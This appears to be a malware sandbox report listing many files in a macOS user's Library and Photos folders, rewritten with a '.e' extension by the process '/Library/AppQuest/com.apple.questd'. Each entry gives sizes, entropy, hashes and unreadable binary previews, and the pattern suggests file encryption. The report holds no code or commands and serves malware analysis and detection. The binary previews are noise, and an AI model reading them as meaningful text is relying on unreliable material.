                                                                                                    Preview: o....d....K...vj.]..R@:w..P.........P.......oq8_K..?t.M...,..m.}..t.!. .#.%K..8.u....71.X.>.....-F^m..}.........X?...S.V......!.q...p-..1..cE......w@.8...}.R.<.<~.....z.O.(G...l5.?Y.$......x..s.x.U#.^...q:....5~.b..6.:...Y.....8........)..6[V.>.f.od4FWs..."..q.]...^...R......e....Q.j#.s.x...ifgB.-..m..h.GL.jd%...S...Mz.~.......l...H|....jA.V.J..e7=i......ma.I@...Io......l.O..?....j..).B...ohll...w>....Y;+...[.A..M..gG..v.R.{.a.bv;....^........>..=......<_....M.4..M.r.....90....'.$.m..GQ.]..~7....2;...6.....y0...y......:.H..C....6..\r.a..ntj.&&..........p..G...YS.oS....6.....7.QN.......t.JT...u../.m...Gn....r>....2.]...4b.|.b..%..=w<O"..r..._PO.}...-..'..s..L..Y{V-..c...CX..C.+..lC.Wn.`.>..Am..`....f........T.^w.`_UR~.>k....N...o...>z:......w....:......,..v.g3X.........F3.D...........uy..."..)>I..d...|.9n.......+....g....`.V...t...St#.t..l....k......I..V....ra..5...*x.H ....xQ....UI.Z+.#......../.....?.I.T.xu<?.v.......(.a.n...(R$...{...=T...#*.6.....u.m...}.mX....x.....y).Z..G....r....
                                                                                                    /Users/ben/Library/Safari/Touch Icons Cache/Images/.660328A7F9004D462085AA67A82065DB.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):3722
                                                                                                    Entropy (8bit):7.841242248304256
                                                                                                    Encrypted:false
                                                                                                    MD5:D557AD562F22D428D7BA1B7C8E4931DD
                                                                                                    SHA1:67B4518923A734DF8610775EEA1E47C89F469923
                                                                                                    SHA-256:BB3B1E744EAB38592E608E702CC94C191BD563CC7D368E65337A1C35104A3630
                                                                                                    SHA-512:7734EFA0BE9D6720B0738E058CC83867C65A3AFBB94797A83A40DA0124FA656E6CB495315F0BA4EB2D0505DE9997A33E5F42AA86F66A8538389C36C2153BD5A6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vjh../.......X..I...Z.^o......oq8_ND[. !....&...=.D..Q.G<...F$......Q....=k..s..[...Irp..K.K.X..V...e0......+.G...m%S......].g..._...............d......W."!....~....u...].........Y.x..,+.K...j...ZO.Bw.[...x...dq .~8Ir......J\.P..6z.d..A1..4.!..7...wu.JL.r.....k....d.s.y....tS.ATm.y...Y.4.....1.PC.g.......1.......=.Q(..L.......6UT/.U.....\.Q.>.z....S.Y....>.i.^.7.....(...........A.u4._:..Lf.............NC.....-.....8.];R..W.a0t..k..2c>-.Z.e.......:.<...X.(.....D].T`.G.m@..\..ly.[%..1^z..j..#..74.-.O.,.z.C.S.......iU<u.]Ep^tZ.m.~......)`..2......*.....2....;t.v.....'. ........[A.w.M...B.n,+.!..............H.v.n.v.........%...)8>...G.&5.v'.z.Q...4...W."sN{.......$...._...`...,S..Z.................G.zr|......+.8...>..'o.....Y.........E...2...FZ..w....S...U.@G.....8...*..Y.>,.......P..1.)..0.W.q....a..o..;l=.....F.$3....M....QZ.W..|.;XYO.s~8;.}..R:.!.}.7.....:r..`.W.O..@.7PWz....J........;....\...L.G...\.@.....,.h.Eg....8.....Z.o-m.`....Al4M.t_...}....y4i.Ww.bJ.../`...........
                                                                                                    /Users/ben/Library/Safari/Touch Icons Cache/Images/.78C4C3399EC15E2AA7A3DF10FDA90BC1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):5002
                                                                                                    Entropy (8bit):7.88579599297971
                                                                                                    Encrypted:false
                                                                                                    MD5:F0B3AF39B5C5E4C230AB4B7AB0C1768E
                                                                                                    SHA1:36A23B7467054608EE8A147DACA88FD050E40581
                                                                                                    SHA-256:60AA26661D6604937994BB461CB626438BB6967393F6E73504EF924DA8643205
                                                                                                    SHA-512:78DFF3430044D8A033AD0AEA6F498D33D6FC632CC34DB3D843CFABBB76D1141CA2B74B2257767EF6B4B6B97A4E170187A55EE4A17327F4A97663EA3F728A31BA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj.]..R@:w..P.........P.......oq8_i..w.:...e.....N...[w.ft....."VT&B]h...b.*J..1.eGhq:..i..E.....=....^.....5.>...2.......P...O.4.......(.....=!g?..Y(....N..>Gb"u....-.Vr....S.D..........r1{........S.D..........r1{........S.D..........r1{........S.D..........r1{........S.D..........r1{........S.D..........r1{........S.D.?......O.r1{........S.D..........r1{........S.D..........r1{........S.D..........r1{........S.D..........r1{........S.D.6.).z.T..uY..O.!.k..&%.t..?......7.%.-~.........._.. .dP.....f..O ........|*.3........F]..F..c..2..m..`...E?#~.'.e?.T...:...5o.~...~.$.\1.. -.t...V=B...uC..r.N...!.N.5.7QX.q./v~.)o[~..X.T....:|o...?h.j.y9...........r...~.Z.......xk.>"..;......CH..`...._..;X....].6.gVn...g....... ........U..C4I...i....q..:a........<&*..He..t.B=.a..}dI)G.d...+....!.[c.Ev.!.\t....Ei...2 .$..'.:...R1UL.)`.D......c.......`s...0...."..s5~.T........v..K......$..9t..\.-VY].[.]`....W..)u...8..'(.>....d..r.r..G.M2..l.|6.G....?...{.U8.........R....Qy.....;X.8.b..Q.!
                                                                                                    /Users/ben/Library/Safari/Touch Icons Cache/Images/.7905D1C4E12C54933A44D19FCD5F9356.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):5458
                                                                                                    Entropy (8bit):7.904353114432535
                                                                                                    Encrypted:false
                                                                                                    MD5:C84A9AC598A50226385152A89FF92BC4
                                                                                                    SHA1:C0CEC822217C94D4787E128A6A145C2ECC84C3AB
                                                                                                    SHA-256:1AE7A72DF4DA1F19F3C0E1F28A6DDDA6E1369FAD0D6E6F5C5817967B7668695A
                                                                                                    SHA-512:F39DEA75F6380B5696DC32083D61420B29F9310682AC46B67906015F51E13A8408567DB9F92153CCB1B82660B9431D90A775F8E4A8752538570D26A0ED300DEE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj.]..R@:w..P.........P.......oq8_.....o...k..^c.z...(..........u.....E.6y3.QDk.U.S..K1B...+..|.I?.@.D.W.............j#;..#.a........../.'...m...s.\......zX........U.un.....U........y1......v." .8.......d...%.:..}."T..KP@?^.(.......Yi....y1......v." .8.......d...%.:..}."T..KP@?^.(.......Yi....y1.....Q.h4(.;.uQ.?.....R..o.,..f+#..-.....s.%.LG4..vd.0..2.......Jp.........T..6.u...Z.`N>..$-..4\U_R...O....w...dU....4"....g....f.O........)J$.W..FM..F{.......q.1.5i.;-......|z$C..W2...$..m.U...a.LIi...t1...c....KI..Y.|R..!^~..f....s.l...._.....=F.'..D.53...|{...|..Ml.%.$.P...A.4.6*_.....>.5...b\...)s....".V0..A....uf...+O..tU.........c/u......f..J0>D.....=Zw...2..pN.........^......g..7..Z..m.9......6.P..h.....E...P..s...f..'....@.....i$../....s...0.....^..........Y.....)..... .*.q............./......"......m...$C.....y..)...0_#.K.....uY..4......'J^t..........!....H.a...>.2=..rX3...mDuy...%...P\<$(..U.hq..(P.r......8....M.......]<o..sqv..Gj~.=.(#..+...i...s[.....u.W.......4,.u7;W.
                                                                                                    /Users/ben/Library/Safari/Touch Icons Cache/Images/.7C20A2B1534F33C9A5F66C656F9DF582.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):5690
                                                                                                    Entropy (8bit):7.911883840127818
                                                                                                    Encrypted:false
                                                                                                    MD5:01706A3EAC637054C87AAE544AB61B24
                                                                                                    SHA1:CFBED686D54E9479F5F26D5F1B3AE346FBB43CC7
                                                                                                    SHA-256:C4685FB4F960F21E61FAAB6BF276630A2A0F90504A83587BEAE70DFFDAE62FFC
                                                                                                    SHA-512:B33ABD6D4ED764466BE0130C13841B4CF500B1255FF3E9A47CE62D86C07410435A13E0649377A83057081E842E081725636A940270E120F104476A67344D025A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj.]..R@:w..\'E._;...w.+.h..!.x.. U...9..#......,.5.C.}%.M....Z< $.V.(_.}y....+u.%..U..F.........p..v.:}......A..%..{../uv.l/T..;........y..?.6r....A,q.yf.\j..*..<s.s.5..J...)7.....Z....f.A9;K.....s.)F.n.....A..d.g....Ss/C..].i.^...9..%.V....3.B.H..NW..+B9..HTx}Xu..q3W.."J....gL..,..V].q..$3.\.Z.ee..&.y.k....#Fj...B.}..i..e...0..C.\.|O.6p(X....@1......`...........%...hD..zm..oi.k...gO}.ST^.[~<.a..EM...{...D.6..{....j.........j....b:.rUH...w.".......>.7...W....]...@gG@....J.....(a!.{V..*.....O..+..Ft+../vz.3..9.{X.....L+.m.g|ax..c4..0..m.V..(Y....<v...u..y....5.;-...bU..O......y...ah..y}{?.t.Q.s..d..eo...\.s\0.y.|..8.P..{I..Vp"....u...k$7..k...Y.?.?...Y$Z..*t.:X..q.. ..."8...O.+7. .....f.e...Q.A...l#.G...X6N.G.1b...i7..X.!TzT2. ......*...4.i.e#X:U.)....?[T..`O."i9<.3.?.}..6..Q..8.....=.....j.e!.....O ....Q...2.....W..........x.L92.V..2..I.n..S.x.`...Jw...d.%.8../..[....J.+........+.a...H..\.o...|..w<...L.*.](....._.1..D...I.h|H+..B.u...i....."...~Vw5....@w.Q.s.....]u%...a.
                                                                                                    /Users/ben/Library/Safari/Touch Icons Cache/Images/.968FCB2E1F3E2C66C36FD5400694FA5F.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):10954
                                                                                                    Entropy (8bit):7.962922093289324
                                                                                                    Encrypted:false
                                                                                                    MD5:FD664FF425FF18C710871BA79AA98176
                                                                                                    SHA1:CA8B567ECFB4CD5F0552496BB13E8B45D89C9466
                                                                                                    SHA-256:6237D5E6E60CF3CDB50B89C56E96BF8BF112FBEC40B0C0984B43E3CA9AE85C95
                                                                                                    SHA-512:3427C8233F74A3BDD10CDF230215AD5E8CFD863B352839694117056E8FDD70981C8A4455104A8DBF9F0C940E56800BC61D127FC47D32BF395EF98D07BDBBD3FA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj.]..R@:w..P.........P.......oq8_o.......U.A4V....:.(S.....G.EN.....Q@)%3..y.^n.h.......A...Fw>....$..aZ.D.ck..A2d..../...j3..P..67r_t.[......T....$...Q^..G.F*Cm3...L......V.k.I./%.:/[..[;...__.....A....W..x..sS."..\.9..T<g.......q..@]..v.....3..../..R.;..v./.0....{".\L-.}.._../#.2.....}..a...n..N...Gs..zL.N@/...HML..Y..7...v..0...q..."...*....V..t..3.....E..\.....J,.d..:M....P..8.h..o.gw..j.......K...4E...."K...`...^..N.`...u..A&.!..`.$./.<...#.{.....b"$.G...E./..o......x.V=....]; .....U.G....H..0.tLs..?4.a.....V.....H.<....K,.....^.B@.S.&*.T...Ka.,........E...H...rR.....$...qO..;..]...'.gd...P@..%....#%...JH}....6..{.\Zl.(.=..!].2]|D..(-.h.w...XX......Q.......j..h.Cv...=h....$...z.V.7h...."....5.=........f.....Zui.......3.et.\#.d8.Gw.$#.-;..QB....^)11.b....a...nP. ...9...-./.d.....Xe."..... ....!,^n&,..G..1....C.[6..T.S..o.Oc.]-.l[....k......A$...W...../...^Y..Y...!..;.^.E..i...Iw5 ..8{......u.K*.W$^T._......8..E......V....o<.#...i....h.V....4_./...^.w..4^.-kGaWp.<....
                                                                                                    /Users/ben/Library/Safari/Touch Icons Cache/Images/.BFDEF2879A3E4C99A8B5E1B3F955B2A6.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):3146
                                                                                                    Entropy (8bit):7.804484479671476
                                                                                                    Encrypted:false
                                                                                                    MD5:26C3DD899A12C1CB2CF31310333E2F1B
                                                                                                    SHA1:D49F678B92654A491F625624CCAD65855AD80659
                                                                                                    SHA-256:6B21D1BA982F42B6518B69FD0B265C00E75215F1415BED42FBB73599F063EEB0
                                                                                                    SHA-512:26573F3C97575AB76E87108346BB38CBD7556720C6076B550D191D4AD89F0909ADB6ED94FECDB4A6D8FF16F016A3DECAD19657219A2F184B7A2E7AD56C2D55C5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vjh../.....O..a.K..6.;.6......oq8_...yFS........2....<....F....).....>V......._........._.X.lK...E...v....88...x...KZ.m.5....G.|lM..r....2.&.....$`.....cl}#.3/...h........}Qyf....4o..D(o....r..#C..,N..O....LJ...$t..d.dv.....U........z.. ."N.e.V..{.\MbNt.?....+A.WtZS*.........?A<...Y..U..........X..\0i...cQ!..&.s.o.u.x..F.....aIgJL.=.q.H@K.....`!g1. ..K....Y).&k'.V......G....>.R..B.l5...<d...........[...H.....!.....&.j.........>..F.B....!.X6...o.XU-..C%._n....c[.....J......1...R...J.,.b..(.J.....I.....HI...'}(rT~.I..'..0...y|...........7..t...9.....Mc0.....4.j.>.?...@p[.....J...rx.....]w.<j.V./...@.p..+...'\.....!...gy@.F.&.B.W..wjU........jB........-.ol...@..K...yb..GY.....?.~R..p....8..B.......1....b....}...o;.H.......:....`..6....,...+.C...%C@Xd3.+p.D\4.......]..>.4v$.`..h...j]J....*-.F..~.q.8,.y........7!1.....p.'.,.Lv....|$6......BD....)...).yxZ.o...M......l.'H..^..T....YA&i.Up.....q.....TD...p.=:9.IC.O'.P.c......h...2..iLD....+x..."5...>.0..WJ..E..p.......L..bR..}+.K
                                                                                                    /Users/ben/Library/Safari/Touch Icons Cache/Images/.D755C41AF03DF316AFF5F74BCD008648.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1210
                                                                                                    Entropy (8bit):7.347074601228169
                                                                                                    Encrypted:false
                                                                                                    MD5:B02F0720A911B0ACA7A974B3E1953A39
                                                                                                    SHA1:E075B3F3B3851FB43FE8070C1D24C05C212AA315
                                                                                                    SHA-256:0A7718FEF98A1DA482DAA85BC5C1A0C75944E72EA6924504F2D35120755531D0
                                                                                                    SHA-512:C17E3E66B8F399383C5B14D200BC81408BDEC6AA67EE70FB08B12EE0C3AAD377BF37682BC8DF914E003808609EAC6CF190240AAF30451F2885E108D6CDB0F48E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj.+.L. .0:N.`.....r.l...9....oq8_0W,*.3Q&...].i.I.1...^PLe......f..[.m.J...?i.........s@.=.../(2pL0....h.0. 9..hm....(WT....e&5.g2...16.[].|0...5:....I.......Y..Z...>.wX....'..J*I...D.B|.Q....-w.UE.]S.f........Cm2..U.>A..>N.......0.Ou8a..M...6h.a.:A......Q.1=KC.Y..;..3`,.....c........#.mN..I Kg.......@d...f......k4..>...!..7.Q'.......a..\y..G...Ep8..;..1.....p..$..+..x.l[.D.xa..v...s..p....!pZ..[..FY.2.L..<....S.........G.].~.e4.....U\..X@7..n^...l.}..T...M..|v'...~7r...u..bD..lP.....~."?.w.m,.A..Z.;(..!.d}.lF..C.r..y.:z.u..........H....M..x.....0}..S|5............,....M..&...p2.Sq.....4l"...H..k..I..O:.3..?X.J.>.Y..mm...6KY.&.L.._.k'...2Y..U.j^71..y....~..Wbiv.D`C#."z...]............;.H..:...D.m..:I....D..]r...y0..B67.{,.b=.."Sv)... .|..;..,.8..s.b...,Hu0.VQ..R.0._...u..l...9....Q'..!.E...2...M.5*.<.r.c...9...>n.xMq&......M.p........J.....R....z.....j..._{..A}T...^.w-...YT.....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7.
                                                                                                    /Users/ben/Library/Safari/Touch Icons Cache/Images/.E845CBDC3785B1A67978CBC5A146A168.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4346
                                                                                                    Entropy (8bit):7.878780580642471
                                                                                                    Encrypted:false
                                                                                                    MD5:974D443A76F610E3C3E18F442B2717CA
                                                                                                    SHA1:22BBD98890B74F13E1D7A34B3489D5184F8E8738
                                                                                                    SHA-256:F407FC07B37E579994AB5B5BDB68A531CC5DEE6BD5C0811FAD0C7A0894B1D331
                                                                                                    SHA-512:0A93B5B7DCBBD44B71E4E69E62A919B3DE266B9D7C45F72EB72470AD8EA57984B3ADFF7954044C786A87A3295DB8ABD078F02C1E9D7BCA83A33139AD315547F1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj.]..R@:w..P.........P.......oq8_.2.....?.......D`.....Fx..##4..W.F..mt..n$..h....0....Z.x.7..d..R.g.UX....0f..Xq........^........c..>........~.......0.@...@Y....d.Y..70L....X~A.....;U..............g......T.I...zQY..3....[.......wD.J..-i;@..8......_;|.?.z.0.y^..0c.*..Y...._.".`#).Xr......S.+......U....{..S....].s.3$....q*.;^..D.J.g.......,...H....G.u...........Z...X.[WF(nvE..O.....xp.?.Y.t{@w...wb..............~.s-.IR.b.Y.{.......J.jI..Wc...S%.K............[P...+.j..b.2....o.\I..}@e...;.T.......[.@..A..[Wblr?..Z..m...?e..(%.hQk..N.1.<p...r.B.t.j......U..|.f.k.7.......T.......1.'.dC...T.....u8.k....N..+!..0...w..%.5.b..S...V.R|.B.L..i]........l)..".0..7.]*....d.>....1.y..7....+vS%.q......jn.......{f....Cx5.i..d.'..W.\..A{..bO....L.a5T..$.@........i.......u....f...X...s.D..e..8e......MuP.o/1........2m({.8!V.B.......G_.mn.n...`........c...).19...M.C.fN.pY...J.8B.fQ `_e...+.\..o.|.....Pq...)......m.+E.>01...(.X3...".w]6.......FR.................%0}...Z780aE9Y..&q.nl./..[w..i
                                                                                                    /Users/ben/Library/Safari/Touch Icons Cache/Images/.FD34EDFE67A924377D8A9DFE9A78A38A.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1426
                                                                                                    Entropy (8bit):5.732183924381018
                                                                                                    Encrypted:false
                                                                                                    MD5:CB39BE2E2AC851436023E999FC0EF37C
                                                                                                    SHA1:F8DFFEBB5AA28128B22E22FF2992C53AAAC8D68A
                                                                                                    SHA-256:79BAC4163B3F81410BA2BAA413B2774564C5EF7E52475B5E3E3C1B4E1357CDEE
                                                                                                    SHA-512:2E9F6E6D07011C05751D78C18E0B62EA2F6CE53D07C1A8919A41AC34D603B9D4A417E0528CF61AD6D6C4EA15D64394D29872C67EAAD1DEDFFDA603B9097697DE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vjh../.....W....EZ/.g.!......H...F.B....*R.?-..#w...=V<y.~.........L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+...................................................................................................................................................................................................................[..?|Y.:<..'....w...y.......r.V...C..F.>.].........P......N..TKP..1.|;.0.D..Lu..?...._......(3P..........N..|t.3.9..=.5...i.g..E...n.#=.;..h...2..o......}..i.@...'..!..~.........!).ZtB*.v...
                                                                                                    /Users/ben/Library/Saved Application State/com.apple.finder.savedState/.data.data.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1354
                                                                                                    Entropy (8bit):7.366924654002792
                                                                                                    Encrypted:false
                                                                                                    MD5:EC336DCDE78B3D0D3525D6F885FAEAA2
                                                                                                    SHA1:CF600A3B3B4C0610597CC2E16BBD5F53D245E1A2
                                                                                                    SHA-256:6EFC6886A013E37E8D3F9DF3AADB0D70C222ACA550DFEC04AD2168B2A60A7C21
                                                                                                    SHA-512:B2CAC185B4AB0C711F8592E23DBAF3F1CAE3B1B99F5D84690941CF946DD39B16FAD309A095913B4EA42770A098225E7E2573572764252B30FF618A8E72328A2F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....L.Y*B......j...rr..D^....<...6.zv.J..x..{.WW...-.....0.......8....B.H..0O...6...G..T.1..01..lK..U.+\..y{..O`..!.....c$Z...}!.j".z...-..........@.....e.A.............(....;...C.M....l..\..+.l...N?.......c......9.........>..h... ..(oV.{.......S.t.H......iHbj.K..D........t...+...x......(C.........C......g.........m..._}..sE..y.....C|tj.h7.....~....1.`.D.wH....O.... ....~[.<).A..-.|....P.....A8m.`Y..c..I....N.w.d...=f.I.c#.....\....L.Y*."...R.{.@.V..=v`....."...q..\jV#=..........VF_..C...R.n....Q.o..$a.....4F<%..r!.2..}h.B7...K.....JB..DG...RZ.J...)N...4..&4V....Xv..?...u.tMn[4V..}.@..J....z..M..\...3....N.._..pc.h...$........R|....=o.hw......,U.....C.......l...+....s..........*0.....|...p...FG..G.....A<Rn..[...!..Q..........N....L.Y*."...R.{.@.V..=v`....."...q..\jV#=..........VF_..C...R.n....Q.o..$a.....4F<%..r!.2..}h.B7...K.....JB..DG...I......)N...4..&4V....Xv..?...u.tMn[4V..}.@....8H....M..\...3....N.._..pc.h...$........R|....=o.hw......,U.....C.......l...+....s..........*0.....|..
                                                                                                    /Users/ben/Library/Saved Application State/com.apple.finder.savedState/.window_1.data.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):5610
                                                                                                    Entropy (8bit):7.912783082272855
                                                                                                    Encrypted:false
                                                                                                    MD5:9312A0B32A7CFB4AC3EDA9BA983FCE7B
                                                                                                    SHA1:A1FBC1304587AA24E840E2995071BE22BC5036A5
                                                                                                    SHA-256:7ED6AD8298BD418452F68C596BF109A577098B2B35672CC90FA9C6711B1A94E2
                                                                                                    SHA-512:53A8BFFDBF5DD77C2F8D88D4A799DACFCA9776EFCEE663A0C6C16949DB7AE01E58113C70338CBA50AD46E053FE659114B9A4C58592CEDE11C69BEFD929154C1A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..e..E...R.c....F..A..g.G..d.'{.....A../..Dg_(H1...o.Z..<.O..D..D.`.c.' .....{..Z....@,w.x..(..C....L'..D..t.~...@.1....j.U...aHf..X>.~Pl. h..^`..b.!....!~..<......N..BI..8.........^.@.........#..s.s...vL.x.BGfK0......#B.(.1.....hH..}...H..un.e.o...|..:.TN...|.|.....8..j.~..:...)....D.I.Ee....C..z.?.~........V.?....e4r....A(@.we.3NGp.Ub.B4>O.b.]8.....(....zf.C..d.w.3..K..#F-.e.......0.[.....0.B........y.....,.a<.?... %..C....t.......N.m...]....zC.8Y.An..T.H...j....K.<.Sj..w....k...'...G..J.....s*..3.K..J..H.aZ..x07.l......}...z3.H..}FE`.......$...df.P:..&K.v..E..c..Ri..W.. f...b.........+...j......M..."0.E.....P.2.....L.].B4.N.0-..N...r.....`2&.5o./I...%9.?..4.M1QK.H.i..h.8...u.#..p..02....P..hxf..dht...hd.....fu.....N.....u.4.^...9.U...`..*......|......./....>.B.+Z.J..|.Fe...sn.....GS...vMv.J^;.b<......=I...S.B.........##.3....0..P..V.\.....#...V.aS...(.....|............H....wF.s. ...<\.eR.....NF.i../s.Bc..!...@...P......N?.F.dG.h.-.O...w.$.0y.........E....(.......F~0...4q...f..-...t#
                                                                                                    /Users/ben/Library/Saved Application State/net.java.openjdk.cmd.savedState/.data.data.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):3258
                                                                                                    Entropy (8bit):7.7896119036507585
                                                                                                    Encrypted:false
                                                                                                    MD5:1AA7A2064252DE2F58CE746B92B2F8CF
                                                                                                    SHA1:78E8C9F51951BCC97D54C3906BF769D8BF1B3D3A
                                                                                                    SHA-256:E758F7AD6965EC5C3194CD01EC5C9017A0EC76845F7F9E0819F5C036FC4D63FD
                                                                                                    SHA-512:B2988808346925264066D23203019408DC8A1BEB196D158BBD0010798738CCCB7ABB33B998BB221985335C042A2FD0F417F36A1E5F54BE0FDA44A5F88B304292
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....L.Y*_.j.C.......q@.r.+...E....Y}.bD..^Fi2A.uXa].....7I...D..eOd>.@0..<.?.4..H...!..:e.al..Al.?....}.4...[.W.....*P5...*...C.&v..S..M./......on.a.......U.....E.$..nV..]%..b.Q.s..E.f.1.."J<.....Gv....v.......=....q.~\i.j..w.-...~....u...k.~.....x......pD...7.....n....5......`K...9....o.-&r=./..6.....J.5#G.Aw.h.2..W`g4.\...#.K..@.c-..2P4.......(?nD.K.."?|..1P.=/#..FmB.A..|.....F?.$.....0h-q(....![..`y:..gQ...#j..)@......Z......R.-.t.M........}....L.Y*..f.)r.@c.BJ...Q...{%.)......v.WwE....&..>G.$.>H.!....]..r..Nx....6..U..|z...-eo?.w..s.U..9.H.G...~.........p"'....VJ......y...c.."...m8..."O8d.....m. $..m..7.B..M..kL...^....5..E(.3H..e].r.^.T.A...v..x.>.Z.v...S.f....*..p....+..K....1.T.*...+H..9d........jg...3.........m.v8....7....i.q...nA...%%M...E%?`.N.F.1HU..U...K...F.]J.\.Y.ZI.:.n..........]p.....bO...k.Qw`..+......M"IY..7+.B........+...u..Y....t..J....."..$.3'e.H...M........._.T...5_.|.w....#..>e..C.Oh+.Y...dqb9.O.`.i....f....|.>r...B..=-..><S......MRD....q.......".(^......&v^....,
                                                                                                    /Users/ben/Library/Saved Application State/net.java.openjdk.cmd.savedState/.restorecount.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):386
                                                                                                    Entropy (8bit):5.176449860821339
                                                                                                    Encrypted:false
                                                                                                    MD5:2710220B2123CCA793092B1861DC87AC
                                                                                                    SHA1:495EA5D13AAA2749895A5955AA206DF74D65C02F
                                                                                                    SHA-256:C15DDF5CFEE257715B5AEFB3A4EB77ECB7BFA96A8CCE949C0112CE5D2F2175FD
                                                                                                    SHA-512:06334B041291F04CEDD2D43B0560EF72E27E921239E74B116C3F7FBD24806679EE84824D475E36E4A08DD07A596A9F2C72225B584C90AA56881306AEF584DCDD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...S.s.......<..=.......e.D$C.?..J........h...7.........!/..........VBpO.,.Q................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Saved Application State/net.java.openjdk.cmd.savedState/.windows.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1242
                                                                                                    Entropy (8bit):7.3625554659464365
                                                                                                    Encrypted:false
                                                                                                    MD5:1FAD978DAF0DCE1258CFD0F297FF5A18
                                                                                                    SHA1:55C79AB5695497EBEF237C4DABC9EE87F6C8952C
                                                                                                    SHA-256:875BAD3C33F6D3F65B486B32D2BB2642F5B24AE359441B31EDE676F7670BC236
                                                                                                    SHA-512:02AF434AFD804264C1A1C88D74481293207385D181D11298DABEC3383808A9E70D7481ABD31FE1CD2C0E82938C65FA298CBD974C43437BE8681B5A1597A65002
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..=..U.......Po...URm...i....@#.<...'..\.YhZ...&`...a ."....\_.....+.e.....9..Y....C........rJ...9..p ~.6..`.;..}...3V...|....&.@.!$...V..TT....z..W...J.Q.GH...]..%...r....L....b$j.x[...}...../#..:.]%s.p.).&....}.......C..gef.6^....U.j..: ..=...q..xY...h...70...(.....lQ=..h.\y...3..i\H...].C......^..)...O@vn..)..n.Y.gA.......|......"...Ey.j......U.$D.....z,4.......0MS.(nL.=.q.....|..r.>b.....,v[:~.SUT..B}.B......,...a...~.w!.............L....A6.G..l......'.hdUL7.%......Py2E^F....6.K{...y%......N{....{SHL.@......|..O.~..........b.c...e%...e,..T?....u5.$+Jz.'.....h|g.f;.Yq..e..q^.;s>..NP.~.....?......*(....>..s...U._v9....[c^........%.$'{.q.5Cx..T...z..Q`P.b..i.%$......7)......g........h.......^c......>D...r.kTxXu.R.Z&...K.....9p....fs>.2e..z.U..z.-;qC.X.P.%...glm.cq|$+..`........|M...aw..:....j$...k....OD......`......B|..?.K....Nt.....l>.t.ks.Z....W.............B..y7.....a...H..}..Q..lRSO..9...........U.2m[#.=.$........................D....|.......xV..ZB..ig...d...S.,L.....E..sv..
                                                                                                    /Users/ben/Pictures/Photos Library.photoslibrary/private/..metadata_never_index.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Pictures/Photos Library.photoslibrary/private/com.apple.mediaanalysisd/MediaAnalysis/.mediaanalysis.db-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
